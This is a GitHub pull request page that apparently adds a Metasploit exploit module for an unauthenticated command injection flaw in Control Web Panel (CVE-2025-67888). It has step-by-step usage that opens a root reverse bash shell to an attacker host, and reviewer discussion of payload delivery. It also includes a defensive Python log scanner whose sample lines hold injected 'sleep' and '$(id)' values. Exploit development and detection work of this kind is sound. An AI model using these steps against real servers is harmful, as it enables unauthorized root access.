Conversation

JohannesLks (Contributor) commented Dec 24, 2025

Fixes #20788

Add Control Web Panel API Command Injection Exploit (CVE-2025-67888)

This PR adds a new exploit module for CVE-2025-67888, an unauthenticated OS command injection vulnerability in Control Web Panel (CWP) versions <= 0.9.8.1208.

What does this change do?

Adds exploit/linux/http/control_web_panel_api_cmd_exec which exploits a blind command injection via the key GET parameter in /admin/index.php when api=1 is set. Successful exploitation grants root-level access.

Prerequisites: Softaculous and/or SitePad must be installed via CWP Scripts Manager.

Files Added

  • modules/exploits/linux/http/control_web_panel_api_cmd_exec.rb
  • documentation/modules/exploit/linux/http/control_web_panel_api_cmd_exec.md

Verification

  • Start msfconsole
  • use exploit/linux/http/control_web_panel_api_cmd_exec
  • set RHOSTS <target>
  • set RPORT 2031
  • set SSL true
  • set LHOST <attacker>
  • check
  • Verify target is detected as vulnerable (time-based check)
  • set payload cmd/unix/reverse_bash
  • exploit
  • Verify shell session opens with root privileges
  • Document verified via included documentation file

References
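
The request shape the PR description gives for this vulnerability (a GET to /admin/index.php with api=1 and an attacker-controlled `key` parameter, probed with a time-based check) is enough to write log-side detection. The following is an added example, not part of the PR or of the Metasploit module: it parses Combined-Log-Format access-log lines and flags CWP admin API requests whose `key` value carries shell metacharacters or a timing-probe command. The log lines are constructed, and the assumption that a legitimate `key` value is a plain alphanumeric token is mine, not something the page states.

```python
"""Flag access-log entries matching the CVE-2025-67888 request shape.

Added example (not the PR's or the module's code). Assumptions: Apache/nginx
Combined Log Format, and a benign `key` value is alphanumeric only.
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log lines; not captured from any real system.
SAMPLE_LOG = """\
203.0.113.5 - - [24/Dec/2025:10:00:01 +0000] "GET /admin/index.php?api=1&key=abc123 HTTP/1.1" 200 512
203.0.113.7 - - [24/Dec/2025:10:00:02 +0000] "GET /admin/index.php?api=1&key=abc%3Bsleep%205 HTTP/1.1" 200 512
203.0.113.9 - - [24/Dec/2025:10:00:03 +0000] "GET /admin/index.php?api=1&key=%24%28id%29 HTTP/1.1" 200 512
203.0.113.9 - - [24/Dec/2025:10:00:04 +0000] "GET /admin/index.php?key=abc%3Bid HTTP/1.1" 200 512
203.0.113.9 - - [24/Dec/2025:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 512
"""

# Minimal Combined Log Format parser: client IP, timestamp, method, target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
VULN_PATH = "/admin/index.php"          # endpoint named in the PR description
SAFE_KEY = re.compile(r"^[A-Za-z0-9]+$")  # assumed shape of a benign key value
SHELL_META = re.compile(r"[;|&`$()<>\n]")  # characters that start a second shell command
TIME_PROBE = re.compile(r"\b(sleep|ping|timeout)\b", re.I)  # blind, time-based probing


def inspect_line(line):
    """Return a finding dict for a suspicious CWP API request, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if parts.path != VULN_PATH:
        return None
    # parse_qs percent-decodes values, so %3B becomes ';' before inspection.
    qs = parse_qs(parts.query, keep_blank_values=True)
    # The PR description ties the injection to api=1; other calls are ignored here.
    if qs.get("api") != ["1"] or "key" not in qs:
        return None
    reasons = []
    for value in qs["key"]:
        if SHELL_META.search(value):
            reasons.append("shell metacharacter in key")
        if TIME_PROBE.search(value):
            reasons.append("time-based probe command in key")
        if not reasons and not SAFE_KEY.match(value):
            reasons.append("non-alphanumeric key")
    if not reasons:
        return None
    return {
        "ip": m.group("ip"),
        "ts": m.group("ts"),
        "key": qs["key"],
        "reasons": reasons,
    }


def scan_log(text):
    """Run inspect_line over every line of an access log; return the findings."""
    return [f for f in (inspect_line(l) for l in text.splitlines()) if f]


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
```

The sample produces two findings: the `;sleep 5` request (flagged for both a metacharacter and a timing probe, which is what the module's time-based `check` would look like on the wire) and the `$(id)` request. The fourth line carries the same metacharacter but no api=1 and is deliberately not flagged; widening the filter to all `key` values on that path is a one-line change if the deployment prefers recall over precision. Correlating the flagged client IP with a later outbound connection from the CWP host (port 2031 is the service side here, the reverse shell goes elsewhere) is the natural next pivot.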

@JohannesLks JohannesLks marked this pull request as draft December 24, 2025 00:26
bcoles (Contributor) commented Dec 24, 2025

see #20788

Pro-tip: If you write "Fixes #20788", then when this PR is merged that issue will also be closed automatically.

@JohannesLks JohannesLks marked this pull request as ready for review December 24, 2025 11:43
@JohannesLks JohannesLks requested a review from bcoles December 24, 2025 11:43
JohannesLks and others added 2 commits December 26, 2025 16:04
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
Co-authored-by: Julien Voisin <jvoisin@users.noreply.github.com>
@msutovsky-r7 msutovsky-r7 changed the title add module for CVE-2025-67888 Adds module for Control Web Panel API Command Injection Exploit (CVE-2025-67888) Jan 8, 2026
@msutovsky-r7 msutovsky-r7 changed the title Adds module for Control Web Panel API Command Injection Exploit (CVE-2025-67888) Adds module for Control Web Panel API Command Injection (CVE-2025-67888) Jan 8, 2026
…y single-line conditional - Remove unnecessary return keyword
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
Contributor (review comment on the lines above):

Using cmdstager is useful when we have space limitations. Are there space limitations, or can we just give the command to execute as-is?
If it is the 2000 byte limit on url, we probably do not need to use cmdstager.

Contributor Author (reply):

@bwatters-r7 I tried to follow the CmdStager docs pattern with two targets. Without the Linux Dropper target, native ELF payloads like linux/x64/meterpreter/reverse_tcp wouldn't work; users would be limited to cmd/unix/* payloads. cmd/unix/python/meterpreter works fine on the unix command target, so maybe the dropper is redundant? Happy to remove it if you think a simpler single target approach is better here.

…pears to CheckCode::Vulnerable - Add cmd/base64 encoder in Payload hash for Unix Command target - Simplify execute_command by removing manual base64 encoding
Development

Successfully merging this pull request may close these issues.

CVE-2025-67888 — Control Web Panel <= 0.9.8.1208 Unauthenticated OS Command Injection Vulnerability

5 participants